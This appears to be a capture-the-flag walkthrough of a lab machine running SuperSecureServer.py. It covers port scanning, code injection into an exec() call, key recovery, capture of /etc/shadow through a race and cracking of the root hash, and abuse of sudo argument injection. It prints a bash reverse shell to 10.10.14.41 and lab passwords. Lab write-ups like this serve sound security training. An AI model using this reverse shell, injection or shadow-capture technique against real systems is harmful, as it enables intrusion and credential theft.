ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.168 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports 10.10.10.168 | tee nmap.txt
Ports 22 and 8080 are open, which are associated with SSH and HTTP Server.
The HTTP webpage is always worth a visit. Upon examination of the source code of the homepage, we find something interesting.
It seems that the source code for the server is in SuperSecureServer.py which is in a secret development directory. We can find this directory with the help of wfuzz.
In the /develop directory, we find SuperSecureServer.py [http://10.10.10.168:8080/develop/SuperSecureServer.py].
We see that the SuperSecureServer.py contains a piece of code susceptible to Code Injection.
Problem: The path from the HTTP Request is directly passed to the exec() function without proper string formatting. Using single quote and semi-colon ( ‘; ) at the end of path , we can easily end the path and execute our own command. Add ‘#’ to comment out rest of the code.
We setup a netcat listener and execute the python payload to get a reverse shell.
We discover that the user directory /home/robert is readable.
Examine the contents of check.txt to understand the use of some files present in this directory.
SuperSecureCrypt.py is used to encrypt check.txt with a key which results in out.txt. Following logic is used for encryption and decryption in this case.
We have input and output, we can use the decrypt option to get the key.
Obtained Key: alexandrovich
Now, we can use this key to decrypt passwordreminder.txt.
Password for robert is obtained: SecThruObsFTW
We can use this password to login through SSH and read user.txt.
Check for files which we can run as root.
We can run BetterSSH.py with root privileges. Upon examination of BetterSSH.py, we notice that there are 2 ways to pop up a root shell!
A directory which is required to run the script is not present. So, we create this directory and make sure that the script works before proceeding ahead.
Above lines of code from the script tell us that the shadow file is being copied into /tmp/SSH directory with some random file name. This file is deleted within a very short period of time, so we need to capture this file. We can use the following python code to capture the said file.
Run this script first and afterwards run the BetterSSH.py. The contents of shadow file are captured.
We can use john to decrypt this hash. Get root details from /etc/passwd and rebuild this password hash in the correct format. Use unshadow to get everything in a form which john can decrypt. Use john to decrypt the password hash.
Root Password is obtained: mercedes
Use this password to pop up root shell.
Insecure command formation leads to privilege escalation.
After authentication, we can supply “-u root” before the command we want to execute as root.
sudo -u robert -u root <cmd> this command is formed while execution.
We can take advantage of this by setting up a netcat listener and creating a bash script with following code:
bash -i >& /dev/tcp/10.10.14.41/4443 0>&1
Upon execution, this pops up a root shell at netcat listener’s endpoint.